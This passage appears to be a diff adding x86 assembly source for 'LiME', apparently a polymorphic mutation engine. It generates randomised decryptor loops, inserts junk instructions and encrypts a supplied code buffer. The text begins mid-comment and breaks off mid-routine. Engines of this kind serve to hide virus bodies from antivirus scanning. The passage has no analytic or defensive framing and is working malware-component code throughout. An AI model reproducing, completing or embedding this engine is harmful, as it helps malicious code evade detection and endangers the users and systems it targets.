+;       EDX = size of decryptor+encrypted data

+

+LIME_BEGIN:

+        dd LIME_SIZE            ; size of [LiME]

+

+lime_pre_opcod_tab db 10000000b ; add

+                   db 10101000b ; sub

+                   db 10110000b ; xor

+                   db 10000000b ; add

+                   

+lime_enc_opcod_tab db  80h,10000000b, 2ah,11000001b     ; add/sub

+                   db  80h,10101000b, 02h,11000001b     ; sub/add

+                   db  80h,10110000b, 32h,11000001b     ; xor/xor

+                   db  82h,10000000b, 2ah,11000001b     ; add/sub

+                   db  82h,10101000b, 02h,11000001b     ; sub/add

+                   db  82h,10110000b, 32h,11000001b     ; xor/xor

+                   db 0c0h,10000000b,0d2h,11001000b     ; rol/ror

+                   db 0c0h,10001000b,0d2h,11000000b     ; ror/rol

+                   

+                   db 0d0h,10000000b,0d0h,11001000b     ; rol/ror

+                   db 0d0h,10001000b,0d0h,11000000b     ; ror/rol

+                   db 0f6h,10010000b,0f6h,11010000b     ; not/not

+                   db 0f6h,10011000b,0f6h,11011000b     ; neg/neg

+                   db 0feh,10000000b,0feh,11001000b     ; inc/dec

+                   db 0feh,10001000b,0feh,11000000b     ; dec/inc

+                   

+                   db  00h,10000000b, 2ah,11000001b     ; add/sub

+                   db  28h,10000000b, 02h,11000001b     ; sub/add

+                   db  30h,10000000b, 32h,11000001b     ; xor/xor

+                    ;--------------------------------------------       

+                   db  10h,10000000b, 1ah,11000001b     ; adc/sbb

+                   db  18h,10000000b, 12h,11000001b     ; sbb/adc

+                   

+                   db  80h,10010000b, 1ah,11000001b     ; adc/sbb

+                   db  80h,10011000b, 12h,11000001b     ; sbb/adc

+                   db  82h,10010000b, 1ah,11000001b     ; adc/sbb

+                   db  82h,10011000b, 12h,11000001b     ; sbb/adc

+

+lime_zero_reg_opcod_tab db 29h,00011000b        ; sub reg,reg

+                        db 2bh,00011000b        ; sub reg,reg

+                        db 31h,00011000b        ; xor reg,reg

+                        db 33h,00011000b        ; xor reg,reg

+lime_init_reg_opcod_tab db 81h,11000000b        ; add reg,xxxxxxxx

+                        db 81h,11001000b        ; or reg,xxxxxxxx

+                        db 81h,11110000b        ; xor reg,xxxxxxxx

+                        db 81h,11000000b        ; add reg,xxxxxxxx

+

+;-----------------------------------------------

+LIME_make_tsh_cod       dd lime_make_tsh_cod

+LIME_make_noflags_cod   dd lime_make_noflags_cod

+LIME_set_disp_reg       dd lime_set_disp_reg

+LIME_save_edi           dd lime_save_edi

+@       equ $

+LIME_rnd                dd lime_rnd

+LIME_rnd_reg            dd lime_rnd_reg

+LIME_rnd_al             dd lime_rnd_al

+LIME_rnd_eax_and_al     dd lime_rnd_eax_and_al

+LIME_rnd_esi            dd lime_rnd_esi

+;-----------------------------------------------

+

+lime_add4_reg_opcod_tab db 11000000b,11000000b,04h,-4h  ; add/add

+                        db 11000000b,11101000b,-4h,04h  ; add/sub

+                        db 11101000b,11101000b,-4h,04h  ; sub/sub

+                        db 11101000b,11000000b,04h,-4h  ; sub/add

+

+lime_mk_mov_cod_addr dw lime_mmc1-@,lime_mmc2-@,lime_mmc3-@

+lime_mk_inc_cod_addr dw lime_mic1-@,lime_mic2-@,lime_mic3-@

+lime_mk_jxx_cod_addr dw lime_mjc1-@,lime_mjc2-@

+

+lime_mk_tsh_cod_addr dw lime_mtc1-@,lime_mtc2-@,lime_mtc3-@,lime_mtc4-@

+                     dw lime_mtc5-@,lime_mtc6-@,lime_mtc7-@,lime_mtc8-@

+                     dw lime_mtc9-@

+;                    dw lime_simd-@

+;                    dw lime_3dnow-@

+

+jxx_addr dd 0

+ret_addr dd 0

+pre_addr dd 0

+pre_count db 0

+

+lime_rnd_val dd 0

+

+orig_reg db 0

+disp_reg db 0

+temp_reg db 0

+key_reg  db 0

+

+        ;   +------------> make no-flags code

+        ;   |+-----------> *reserved* for SIMD Instruction

+        ;   ||+----------> *reserved* for 3DNow! Instruction

+        ;   |||   +------> xchg disp_reg with orig_reg

+        ;   |||   |

+para_eax db 00000000b   ; parameters of LiME

+para_ebx dd 0           ; address of buffer for new decryptor

+para_ecx dd 0           ; begin of code to be decrypted

+para_edx dd 0           ; size of code to be decrypted

+para_ebp dd 0           ; displacement of decryptor

+para_esp dd 0

+

+        ;   +--------------------> byte / dword

+        ;   |+-------------------> mod := (disp32/disp8)

+        ;   ||+------------------> *not used*

+        ;   |||+-----------------> *not used*

+        ;   ||||+----------------> inc reg / dec reg

+        ;   |||||++--------------> *not used*

+        ;   |||||||+-------------> clc / stc

+enc_type dd 00000000b

+

+adr_ndx dd 0

+adr_0   dd 0,0,0,0,0,0,0,0

+adr_1   dd 0,0,0,0,0,0,0,0

+adr_2   dd 0,0,0,0,0,0,0,0

+adr_3   dd 0,0,0,0,0,0,0,0

+

+lime_mmx_opcod_tab:

+db  60h, 61h, 62h, 63h, 64h, 65h, 66h, 67h, 68h, 69h, 6ah, 6bh, 6eh, 6fh

+db  74h, 75h, 76h, 6eh, 6fh,0d1h,0d2h,0d3h,0d5h,0d8h,0d9h,0dbh,0dch,0ddh

+db 0dfh,0e1h,0e2h,0e5h,0e8h,0e9h,0ebh,0ech,0edh,0efh,0f1h,0f2h,0f3h,0f5h

+db 0f8h,0f9h,0fah,0fch,0fdh,0feh

+

+; ---------------------------------------------------------------

+

+LIME:

+        pushf

+        cld

+        

+        mov edi,ebx

+        

+        push ebp

+        call lime_reloc

+lime_reloc:

+        pop ebp

+        sub ebp,lime_reloc-@

+        pop dword [ebp-@+para_ebp]

+        mov [ebp-@+para_ebx],ebx

+        mov [ebp-@+para_ecx],ecx

+        mov [ebp-@+para_edx],edx

+        mov [ebp-@+para_esp],esp

+        

+        call lime_make_prefix_decrypt   ;

+        mov [ebp-@+pre_addr],esp

+

+        mov al,3

+        call [ebp-@+LIME_rnd_eax_and_al]

+        mov [ebp-@+adr_ndx],eax

+        xchg ecx,eax

+        inc ecx

+        lea esi,[ebp-@+adr_0]

+lime_make_next_decrypt:

+        call lime_make_decrypt          ;

+        ror dword [ebp-@+enc_type],8

+        loop lime_make_next_decrypt

+        

+        call lime_encrypt               ;

+        

+        mov ecx,[ebp-@+para_ebx]

+        mov edx,edi

+        sub edx,ecx

+

+        mov esp,[ebp-@+para_esp]       

+        popf

+        ret

+        

+; ---------------------------------------------------------------

+

+lime_make_prefix_decrypt:

+        pop dword [ebp-@+ret_addr]

+        call [ebp-@+LIME_make_tsh_cod]

+

+        mov al,7

+        call [ebp-@+LIME_rnd_eax_and_al]

+        add al,7

+        mov [ebp-@+pre_count],al

+        xchg ecx,eax

+mk_next_prefix_decrypt:

+        call [ebp-@+LIME_make_tsh_cod]

+        call [ebp-@+LIME_set_disp_reg]

+        

+        call lime_make_mov_cod

+        push edi                        ; p0

+        stosd

+        

+        call lime_make_xchg_cod_rnd

+        

+        mov al,02h

+        call [ebp-@+LIME_rnd_eax_and_al]

+        add al,81h              ; (add/sub/xor) dword [reg+(xxxxxx)xx],xxxxxxxx

+        stosb

+        push eax

+        mov al,03h

+        call [ebp-@+LIME_rnd_al]

+        lea ebx,[ebp-@+lime_pre_opcod_tab]

+        xlatb

+        or al,[ebp-@+disp_reg]

+        stosb

+        pop ebx

+        push edi                        ; p1

+        call [ebp-@+LIME_rnd]

+        stosd

+        jp lmpd_a1

+        xor byte [edi-05h],11000000b

+        sub edi,byte 03h

+lmpd_a1:

+        call [ebp-@+LIME_rnd]

+        stosd

+        cmp bl,83h

+        jnz lmpd_a2

+        sub edi,byte 03h

+lmpd_a2:

+    

+        loop mk_next_prefix_decrypt

+        

+        call [ebp-@+LIME_make_tsh_cod]

+        push dword [ebp-@+ret_addr]

+        ret

+        

+; ---------------------------------------------------------------

+

+lime_make_decrypt:

+        push ecx

+        call [ebp-@+LIME_make_tsh_cod]

+        call [ebp-@+LIME_set_disp_reg]

+

+;       mov al,0cch

+;       stosb                                   ; *test*

+        

+        call lime_make_mov_cod

+        call [ebp-@+LIME_save_edi]      ; a0 = disp value

+        stosd

+        

+        call [ebp-@+LIME_make_tsh_cod]

+        call [ebp-@+LIME_rnd]

+        and al,11111001b

+        mov [ebp-@+enc_type],al

+        mov bl,al

+        rol al,1

+        mov ah,al

+        call [ebp-@+LIME_rnd_reg]

+        mov [ebp-@+key_reg],al

+        shl ah,3

+        or al,ah

+        or al,0b0h              ; mov reg,key

+        stosb

+        call [ebp-@+LIME_rnd]

+        mov [esi+4*6],eax               ; a7 = key

+        stosd

+        test bl,10000000b

+        jnz lmd_a1

+        sub edi,byte 03h

+lmd_a1:

+        call [ebp-@+LIME_rnd]

+        and al,00000010b

+        mov [ebp-@+para_eax],al

+        call lime_make_xchg_cod_rnd

+        

+        call [ebp-@+LIME_save_edi]      ; a1 = address of loop

+        call [ebp-@+LIME_make_tsh_cod]

+        

+        mov al,[ebp-@+disp_reg]

+        mov [ebp-@+orig_reg],al

+        

+        push esi

+        lea esi,[ebp-@+lime_enc_opcod_tab]

+        mov al,22

+        call [ebp-@+LIME_rnd_esi]

+        add esi,eax

+        cmp eax,byte 16*2

+        pushf

+        lodsd

+        test bl,10000000b

+        jz lmd_a2

+        or eax,00010001h

+lmd_a2:

+        popf

+        push eax

+        jbe mk_no_cf

+        mov al,bl

+;       and al,01h

+        or al,0f8h              ; clc / stc

+        stosb

+        call [ebp-@+LIME_make_noflags_cod]

+mk_no_cf:

+        pop eax

+        pop esi

+        mov bh,bl

+        and bh,01000000b

+        sub ah,bh

+        mov [esi],eax                   ; a2 = decryptic type

+        add esi,byte 04h

+        or ah,[ebp-@+disp_reg]

+        cmp al,40h

+        jae lmd_a3

+        mov dh,[ebp-@+key_reg]

+        rol dh,3

+        or ah,dh

+lmd_a3:

+        stosw                   ; (add/sub/xor...) (b/w) [reg+(xxxxxx)xx],key

+        xchg edx,eax

+        call [ebp-@+LIME_rnd]

+        jp lmd_a4

+        and byte [edi-01h],11111000b

+        or byte [edi-01h],00000100b

+        and al,11000000b

+        or al,00100000b

+        or al,[ebp-@+disp_reg]

+        stosb

+lmd_a4:

+        call [ebp-@+LIME_save_edi]      ; a3 = address of displacement

+        call [ebp-@+LIME_rnd]

+        stosd

+        test bl,01000000b

+        jz lmd_a5

+        sub edi,byte 03h

+lmd_a5:

+        cmp dl,0d0h

+        jae mk_no_val

+        cmp dl,40h

+        jb mk_no_val

+        call [ebp-@+LIME_rnd]

+        and al,7fh

+        stosd

+        cmp dl,81h

+        jz lmd_a6

+        and eax,byte 7fh

+        sub edi,byte 03h

+lmd_a6:

+        mov [esi+4*3],eax               ; a7 = key

+mk_no_val:

+        

+        call lime_make_xchg_cod_rnd

+        call lime_make_inc_cod  ; (inc/dec) reg

+        call lime_make_xchg_cod_rnd

+        

+        mov ax,0f881h           ; cmp reg,xxxxxxxx

+        or ah,[ebp-@+disp_reg]

+        stosw

+        call lime_aox_eax

+        call [ebp-@+LIME_save_edi]      ; a4 = address of "cmp reg,xxxxxxxx"

+        stosd

+        

+        call [ebp-@+LIME_make_noflags_cod]

+        

+        test byte [ebp-@+para_eax],00000010b

+        jz mk_no_xchg

+        mov al,04h

+        call [ebp-@+LIME_rnd_eax_and_al]

+        add al,87h              ; xchg orig_reg,disp_reg

+        stosb

+        mov al,[ebp-@+orig_reg]

+        mov ah,al

+        xchg [ebp-@+disp_reg],al

+        dec edi

+        cmp ah,al

+        jz mk_no_xchg

+        inc edi

+        rol ah,3

+        or al,ah

+        or al,11000000b

+        cmp byte [edi-01h],87h

+        jnz lmd_a7

+        call lime_xchg_reg

+lmd_a7:

+        stosb

+        call [ebp-@+LIME_make_noflags_cod]

+mk_no_xchg:

+        and byte [ebp-@+para_eax],11111101b

+        

+        call lime_make_jz_cod   ; jxx (xxxxxx)xx

+        call [ebp-@+LIME_save_edi]      ; a5 = address of "jxx xx"

+        

+        call [ebp-@+LIME_make_noflags_cod]

+        

+        mov al,0e9h             ; jmp xxxxxxxx

+        stosb

+        mov eax,[esi-5*4]       ; address of loop

+        sub eax,edi

+        dec eax

+        cmp eax,byte -80h

+        jae mk_short_jmp

+        sub eax,byte 03h

+        stosd

+        jmp short mk_jmp_end

+mk_short_jmp:

+        mov byte [edi-01h],0ebh ; jmp xx

+        stosb

+mk_jmp_end:

+        

+        call lime_rnd_trash

+        call [ebp-@+LIME_save_edi]      ; a6

+        

+        push esi

+        mov esi,[esi-4*2]       ; address of "jxx xx"

+        mov eax,edi

+        sub eax,esi

+        cmp byte [esi-02h],00h

+        jnz mk_jz_a

+        sub esi,byte 03h

+mk_jz_a:

+        mov [esi-01h],al

+        pop esi

+        add esi,byte 04h

+        

+        pop ecx

+        ret

+        

+; -------------------------------       

+;       ...

+;       mov reg,xxxxxxxx <---- a0

+;       ...

+;a1:    

+;       ...

+;       xor [eax+xx],key <---- a7

+;       ^^^(a2)  ^^a3

+;       ...

+;       inc eax

+;       ...

+;       cmp eax,xxxxxxxx <---- a4

+;       ...

+;       jz a6

+;a5:

+;       ...

+;       jmp a1

+;       ...

+;a6:

+; -------------------------------       

+

+; ---------------------------------------------------------------

+        

+lime_encrypt:

+        mov ecx,[ebp-@+para_edx]

+        mov esi,[ebp-@+para_ecx]

+        repz movsb

+

+        push edi

+calc_disp:

+        rol dword [ebp-@+enc_type],8

+        mov eax,0aa9090ach

+        test byte [ebp-@+enc_type],10000000b

+        jz le_a1

+        or eax,01000001h

+le_a1:

+        mov [ebp-@+enc_buff-01h],eax

+

+        lea esi,[ebp-@+adr_0]

+        imul ebx,[ebp-@+adr_ndx],byte 4*8

+        lea edx,[esi+ebx]

+        mov eax,edi

+        mov esi,edi

+        sub eax,[edx+4*6]

+        and al,11111100b

+        add eax,byte 04h

+        sub esi,eax

+        mov eax,esi

+        

+        sub eax,[ebp-@+para_ebx]

+        add eax,[ebp-@+para_ebp]

+        mov ebx,[edx+4*3]

+        mov ecx,[ebx]

+        test byte [ebp-@+enc_type],01000000b

+        jz le_a2

+        movsx ecx,cl

+le_a2:

+        sub eax,ecx

+        mov ecx,[edx+4*7]       ; decryptic value

+        

+        test byte [ebp-@+enc_type],00001000b

+        jnz le_a3

+        mov ebx,[edx]           ; address of "mov reg,xxxxxxxx"

+        mov [ebx],eax

+        add eax,edi

+        sub eax,esi

+        mov ebx,[edx+4*4]       ; address of "cmp reg,xxxxxxxx"

+        jmp short le_a4

+le_a3:

+        mov ebx,[edx+4*4]       ; address of "cmp reg,xxxxxxxx"

+        mov [ebx],eax

+        add eax,edi

+        sub eax,esi

+        mov ebx,[edx]           ; address of "mov reg,xxxxxxxx"

+le_a4:

+        mov [ebx],eax

+        

+;       jmp _test1_lime_encrypt                 ; *test*

+        mov eax,[edx+4*2]       ; decryptic type

+        shr eax,16

+        mov [ebp-@+enc_buff],ax

+        mov ebx,edi

+        mov edi,esi

+        

+        mov al,[ebp-@+enc_type]

+;       and al,1

+        or al,0f8h              ; clc / stc

+        mov [ebp-@+enc_buff-02h],al

+

+encrypt_prog:

+        db 90h

+        lodsb                   ; 0ach

+enc_buff db 90h,90h

+        stosb                   ; 0aah

+        cmp esi,ebx

+        jb encrypt_prog

+_test1_lime_encrypt:

+

+        cmp byte [ebp-@+adr_ndx],0

+        jz lime_prefix_encrypt

+        dec byte [ebp-@+adr_ndx]

+        jmp calc_disp

+

+; ---------------------------------------------------------------

+        

+lime_prefix_encrypt:

+;       jmp _test2_lime_encrypt                 ; *test*

+        movzx ecx,byte [ebp-@+pre_count]

+        mov edi,[ebp-@+pre_addr]

+lpe_next:

+        mov al,1fh

+        call [ebp-@+LIME_rnd_eax_and_al]

+        add eax,[ebp-@+adr_0+4*1]       ; address of loop

+        mov ebx,eax

+        sub eax,[ebp-@+para_ebx]

+        add eax,[ebp-@+para_ebp]

+        mov esi,[edi]

+        mov edx,[esi]

+        push esi

+        add esi,byte 04h

+        test byte [esi-05h],01000000b

+        jz lpe_a1

+        movsx edx,dl

+        sub esi,byte 03h

+lpe_a1:

+        sub eax,edx

+        mov edx,[edi+04h]

+        mov [edx],eax

+        add edi,byte 08h

+        mov edx,[esi]

+        pop esi

+        mov eax,[esi-02h]

+        cmp al,83h

+        jnz lpe_a2

+        movsx edx,dl

+lpe_a2:

+        and ah,00111000b

+        jz lpe_sub

+        cmp ah,00101000b

+        jz lpe_add

+        xor [ebx],edx

+        loop lpe_next

+        jmp short lime_encrypt_end

+lpe_sub:

+        sub [ebx],edx

+        loop lpe_next

+        jmp short lime_encrypt_end

+lpe_add:

+        add [ebx],edx

+        loop lpe_next

+_test2_lime_encrypt:

+

+lime_encrypt_end:

+        pop edi

+        call lime_rnd_trash

+        ret

+

+; ---------------------------------------------------------------

+

+lime_set_disp_reg:

+        push edx

+lsdr_l:

+        mov al,111b

+        call [ebp-@+LIME_rnd_al]

+        cmp al,100b

+        jz lsdr_l

+        mov dl,[ebp-@+key_reg]

+        test bl,10000000b

+        jnz lsdr_a

+        and dl,011b

+lsdr_a:

+        cmp al,dl

+        jz lsdr_l

+        cmp al,[ebp-@+disp_reg]

+        jz lsdr_l

+        mov [ebp-@+disp_reg],al

+        mov [ebp-@+temp_reg],al

+        pop edx

+        ret

+

+lime_rnd:

+        push edx

+        rdtsc

+        xor eax,[ebp-@+lime_rnd_val]

+        adc eax,edi

+        neg eax

+        sbb eax,edx

+        rcr eax,1

+        xor [ebp-@+lime_rnd_val],eax

+        pop edx

+        ret

+

+lime_rnd_eax_and_al:

+        push edx

+        movzx edx,al

+        call [ebp-@+LIME_rnd]

+        and eax,edx

+        pop edx

+        ret

+

+lime_rnd_al:

+        push edx

+        mov edx,eax

+lra_l:  

+        call [ebp-@+LIME_rnd]

+        cmp al,dl

+        ja lra_l

+        mov dl,al

+        xchg eax,edx

+        pop edx

+        ret

+

+lime_rnd_esi:

+        and eax,byte 07fh

+        call [ebp-@+LIME_rnd_al]

+        add eax,eax

+        add esi,eax

+        ret

+

+lime_rnd_addr:

+        call [ebp-@+LIME_rnd_esi]

+        movzx eax,word [esi]

+        lea esi,[eax+@]

+        ret

+

+lime_save_edi:

+        mov [esi],edi

+        add esi,byte 04h

+        ret

+

+lime_rnd_reg_dd:

+        mov al,01h

+lime_rnd_reg:

+        push ecx

+        push edx

+        xchg edx,eax

+lrr_l:

+        mov al,111b

+        call [ebp-@+LIME_rnd_al]

+        mov ah,al

+        test dl,01h

+        jnz lrr_w

+        and al,011b

+lrr_w:

+        cmp al,100b

+        jz lrr_l

+        cmp al,[ebp-@+disp_reg]

+        jz lrr_l

+        cmp al,[ebp-@+temp_reg]

+        jz lrr_l

+        and al,011b

+        mov cl,[ebp-@+key_reg]

+        and cl,011b

+        cmp al,cl

+        jz lrr_l

+        mov dl,ah

+        xchg eax,edx

+        pop edx

+        pop ecx

+        ret

+        

+lime_rnd_trash: 

+        push ecx

+        mov al,3

+        call [ebp-@+LIME_rnd_eax_and_al]

+        or al,04h

+        xchg ecx,eax

+lrt_l:  

+        call [ebp-@+LIME_rnd]

+        stosb

+        loop lrt_l

+        pop ecx

+        ret

+        

+lime_rnd_rm:

+        push edx        

+        xor edx,edx

+        mov dl,al

+        mov ah,al

+        rol ah,3

+        mov al,[edi-01h]

+        call [ebp-@+LIME_rnd_reg]

+        or ah,al

+        rol ah,3

+        mov al,[edi-01h]

+        call [ebp-@+LIME_rnd_reg]

+        or al,ah

+        stosb

+        cmp dl,11b

+        jz lrr_a2

+        and al,11000111b

+        push eax

+        cmp eax,edi

+        jp lrr_a1

+        or ah,00000100b

+        mov [edi-01h],ah

+        mov ah,al

+        mov al,0ffh

+        call [ebp-@+LIME_rnd_al]

+        and al,11111000b

+        xor al,ah

+        stosb

+lrr_a1:

+        call [ebp-@+LIME_rnd]

+        stosd

+        pop eax

+        cmp al,00000101b

+        jz lrr_a2

+        cmp dl,10b

+        je lrr_a2

+        sub edi,byte 04h

+        add edi,edx

+lrr_a2:

+        pop edx

+        ret

+        

+lime_xchg_reg:

+        push edx

+        cmp eax,edi

+        jp lxr_e

+        and al,00111111b

+        mov edx,eax

+        shr al,3

+        shl dl,3

+        or al,dl

+        or al,11000000b

+lxr_e:

+        pop edx

+        ret     

+

+lime_aox_eax:

+        cmp eax,edi

+        jp lae_e

+        test byte [edi-01h],111b

+        jnz lae_e

+        dec edi

+        mov al,[edi]

+        dec edi

+        and al,00111000b

+        or al,00000101b

+        stosb

+lae_e:

+        ret

+

+; ---------------------------------------------------------------

+

+lime_make_mov_cod:

+        push esi

+        lea esi,[ebp-@+lime_mk_mov_cod_addr]

+        mov al,02h

+        call lime_rnd_addr

+        call esi

+        pop esi

+        ret

+lime_mmc1:

+        mov al,0b8h             ; mov reg,xxxxxxxx

+        or al,[ebp-@+disp_reg]

+        stosb

+        ret

+lime_mmc2:                      ; set reg=0 / (add/or/xor) reg,xx

+        lea esi,[ebp-@+lime_zero_reg_opcod_tab]

+        mov al,03h

+        call [ebp-@+LIME_rnd_esi]

+        lodsd

+        or ah,[ebp-@+disp_reg]

+        rol ah,3

+        or ah,[ebp-@+disp_reg]

+        stosw

+        call lime_make_xchg_cod_rnd

+        lea esi,[ebp-@+lime_init_reg_opcod_tab]

+        mov al,03h

+        call [ebp-@+LIME_rnd_esi]

+        lodsd

+        or ah,[ebp-@+disp_reg]

+        stosw

+        call lime_aox_eax

+        ret

+lime_mmc3:

+        mov ax,0a08dh           ; lea reg,xxxxxxxx

+        or ah,[ebp-@+disp_reg]

+        rol ah,3

+        stosw

+        ret

+

+lime_make_xchg_cod_rnd:

+        cmp eax,edi

+        jp lime_mxc_e

+        or byte [ebp-@+para_eax],00000010b

+        call [ebp-@+LIME_make_tsh_cod]

+        mov dl,[ebp-@+disp_reg]

+        mov al,07h

+        call [ebp-@+LIME_rnd_eax_and_al]

+        test byte [ebp-@+key_reg],011b

+        jz lime_mxc_a1

+        test al,100b

+        jnz lime_mxc_a6

+lime_mxc_a1:

+        and al,011b

+        test al,01b

+        jz lime_mxc_a4

+        cmp dl,101b

+        jnz lime_mxc_a2

+        and al,01b

+lime_mxc_a2:

+        add al,8ah

+        stosb

+        call [ebp-@+LIME_set_disp_reg]

+        rol al,3

+        or al,dl

+        stosb

+        cmp byte [edi-02h],8dh

+        jz lime_mxc_a3

+        or byte [edi-01h],11000000b

+lime_mxc_a3:

+        jmp short lime_mxc_e

+lime_mxc_a4:

+        add ax,1887h            ; mov ah,00011regb

+        stosb

+        or ah,[ebp-@+disp_reg]

+        rol ah,3

+        call [ebp-@+LIME_set_disp_reg]

+        or al,ah

+        cmp byte [edi-01h],87h

+        jnz lime_mxc_a5

+        call lime_xchg_reg

+lime_mxc_a5:

+        stosb

+lime_mxc_e:

+        call [ebp-@+LIME_make_tsh_cod]

+        ret

+lime_mxc_a6:

+        call [ebp-@+LIME_set_disp_reg]

+        cmp dl,000b

+        jz lime_mxc_a7

+        mov al,90h

+        or al,dl

+        mov byte [ebp-@+disp_reg],00h

+        jmp short lime_mxc_a5

+lime_mxc_a7:

+        call [ebp-@+LIME_set_disp_reg]

+        or al,90h

+        jmp short lime_mxc_a5

+

+; ---------------------------------------------------------------

+

+lime_make_inc_cod:

+        push esi

+        lea esi,[ebp-@+lime_mk_inc_cod_addr]

+        mov al,01h

+        call lime_rnd_addr

+        mov al,bl

+        and al,00001000b

+        or al,[ebp-@+disp_reg]

+        test bl,10000000b

+        jz lime_mic_t

+        lea esi,[ebp-@+lime_mic3]

+lime_mic_t:

+        call esi

+        pop esi

+        ret

+lime_mic1:

+        or al,40h               ; (inc/dec) reg

+        stosb

+        ret

+lime_mic2:

+        or al,11000000b

+        mov ah,al

+        mov al,0ffh             ; (inc/dec) reg

+        stosw

+        ret

+lime_mic3:                      ; (add/sub) reg,xx / (add/sub) reg,xx

+        mov al,81h

+        stosb

+        lea esi,[ebp-@+lime_add4_reg_opcod_tab]

+        mov al,03h

+        call [ebp-@+LIME_rnd_esi]

+        add esi,eax

+        mov edx,[esi]

+        mov al,dl

+        or al,[ebp-@+disp_reg]

+        stosb

+        call lime_aox_eax

+        call [ebp-@+LIME_rnd]

+        stosd

+        xchg ecx,eax

+        push edx

+        call lime_make_xchg_cod_rnd

+        pop edx

+        mov al,81h

+        stosb

+        mov al,dh

+        or al,[ebp-@+disp_reg]

+        stosb

+        call lime_aox_eax

+        cmp dh,dl

+        jnz lime_mic3_a1

+        neg ecx

+lime_mic3_a1:

+        xchg eax,edx

+        shr eax,16

+        test bl,00001000b

+        jz lime_mic3_a2

+        shr eax,8

+lime_mic3_a2:

+        movsx eax,al

+        add eax,ecx

+        stosd

+        ret

+

+; ---------------------------------------------------------------

+

+lime_make_jz_cod:

+        push esi

+        lea esi,[ebp-@+lime_mk_jxx_cod_addr]

+        mov al,01h

+        call lime_rnd_addr

+        mov al,01h

+        call [ebp-@+LIME_rnd_al]

+        test bl,00001000b

+        call esi

+        pop esi

+        ret

+lime_mjc1:

+        jz lime_mjc1_a

+        mov al,0ffh

+lime_mjc1_a:

+        add al,73h              ; jz(ae/b) xx

+        stosw

+        ret

+lime_mjc2:

+        mov ah,al

+        jz lime_mjc2_a

+        mov ah,0ffh

+lime_mjc2_a:

+        add ah,83h              ; jz(ae/b) xxxxxxxx

+        mov al,0fh

+        stosw

+        xor eax,eax

+        stosd

+        ret

+

+; ---------------------------------------------------------------

+

+lime_make_noflags_cod:

+        or byte [ebp-@+para_eax],10000000b

+        call [ebp-@+LIME_make_tsh_cod]

+        and byte [ebp-@+para_eax],01111111b

+        ret

+

+lime_make_tsh_cod:

+;       ret                                     ; *test*

+        push ebx

+        push ecx

+        push edx

+        push esi

+        mov al,3

+        call [ebp-@+LIME_rnd_eax_and_al]

+        or eax,byte 01h

+        xchg ecx,eax

+lmtc_l:

+        lea esi,[ebp-@+lime_mk_tsh_cod_addr]

+        xor eax,eax

+        mov al,08h

+        test byte [ebp-@+para_eax],10000000b

+        jz lmtc_t1

+        mov al,03h

+lmtc_t1:

+        call [ebp-@+LIME_rnd_al]

+        rol eax,1

+        add esi,eax

+        movzx eax,word [esi]

+        lea esi,[eax+@]

+        call [ebp-@+LIME_rnd]

+        call esi

+        mov esi,[ebp-@+jxx_addr]

+        or esi,esi

+        jz lmtc_t2

+        mov eax,edi

+        sub eax,esi

+        cmp eax,byte 02h

+        jbe lmtc_t2

+        mov [esi-01h],al

+        and dword [ebp-@+jxx_addr],byte 00h

+lmtc_t2:

+        loop lmtc_l

+        and dword [ebp-@+jxx_addr],byte 00h

+        pop esi

+        pop edx

+        pop ecx

+        pop ebx

+        ret

+

+lime_mtc1:                      ; 8087

+        and al,00000100b

+        or al,0d8h

+        stosb

+lmtc1_a1:

+        mov al,ah

+        and ah,00000111b

+        cmp ah,00000101b

+        jnz lmtc1_a2

+        and al,00111111b

+        stosb

+        mov al,7fh

+        call [ebp-@+LIME_rnd_eax_and_al]

+        add eax,[ebp-@+para_ebp]

+        stosd

+        ret

+lmtc1_a2:

+        or al,11000000b

+        stosb

+        ret

+

+lime_mtc2:

+        mov al,0fh

+        call [ebp-@+LIME_rnd_al]

+        or al,80h

+        cmp al,8dh              ; lea reg,[reg]

+        jz lmtc2_a

+        cmp al,8bh

+        ja lime_mtc2

+        cmp al,86h

+        jb lime_mtc2

+        stosb                   ; (xchg/mov) reg,reg

+        mov al,11b

+        call lime_rnd_rm

+        jmp short lime_mtc2

+lmtc2_a:

+        stosb

+        mov al,10b

+        call [ebp-@+LIME_rnd_al]

+        call lime_rnd_rm

+        ret

+

+lime_mtc3:                      ; MMX

+        push eax

+        mov al,0fh

+        stosb

+        lea ebx,[ebp-@+lime_mmx_opcod_tab]

+        mov al,2fh

+        call [ebp-@+LIME_rnd_al]

+        xlatb

+        stosb

+        pop eax

+        or al,11000000b

+        stosb

+        ret

+

+lime_mtc4:

+        and al,01h

+        mov dl,al

+        shl dl,3

+        call [ebp-@+LIME_rnd_reg]

+        or al,0b0h              ; mov reg,xxxxxx(xx)

+        or al,dl

+        stosb

+        cmp al,0b8h

+        jb lmtc4_a

+        call [ebp-@+LIME_rnd]

+        and eax,0bfff83ffh

+        stosd

+        ret

+lmtc4_a:

+        call [ebp-@+LIME_rnd]

+        stosb

+        ret

+

+lime_mtc5:

+        and al,03h

+        or al,80h               ; (add/or/adc/sbb/and/sub/xor/cmp) reg,xx

+        stosb

+        call [ebp-@+LIME_rnd_reg]

+        or al,11000000b

+        stosb

+        call [ebp-@+LIME_rnd]

+        and eax,83ffbfffh

+        stosd

+        cmp byte [edi-06h],81h

+        jz lime_mtc5_a

+        sub edi,byte 03h

+lime_mtc5_a:

+;       ret

+

+lime_mtc6:

+        cmp dword [ebp-@+jxx_addr],byte 00h

+        jnz lime_mtc4

+        mov al,0fh

+        call [ebp-@+LIME_rnd_eax_and_al]     

+        or al,70h               ; jxx xx

+        stosw

+        mov [ebp-@+jxx_addr],edi

+        call lime_mtc5

+        ret

+

+lime_mtc7:

+        jp lime_mtc7_a

+        and al,01h

+        or al,0feh              ; (inc/dec) reg

+        stosb

+        call [ebp-@+LIME_rnd_reg]

+        and ah,00001000b

+        or al,11000000b

+        or al,ah

+        stosb

+        ret

+lime_mtc7_a:

+        call lime_rnd_reg_dd

+        and ah,00001000b

+        or ah,40h               ; (inc/dec) reg

+        or al,ah

+        stosb

+        ret

+

+lime_mtc8:

+;       ret

+        call lime_rnd_reg_dd

+        mov dl,al

+        mov [ebp-@+temp_reg],al

+        or al,0b8h              ; mov reg,xxxxxxxx

+        stosb

+        call [ebp-@+LIME_rnd]

+        stosd

+        push edi

+        push eax

+        call [ebp-@+LIME_make_noflags_cod]

+        call [ebp-@+LIME_rnd]

+        and al,08h

+        or al,40h               ; (inc/dec) reg

+        or al,[ebp-@+temp_reg]

+        stosb

+        push eax

+        call [ebp-@+LIME_make_noflags_cod]

+        mov ax,0f881h           ; cmp reg,xxxxxxxx

+        or ah,[ebp-@+temp_reg]

+        stosw

+        mov al,7fh

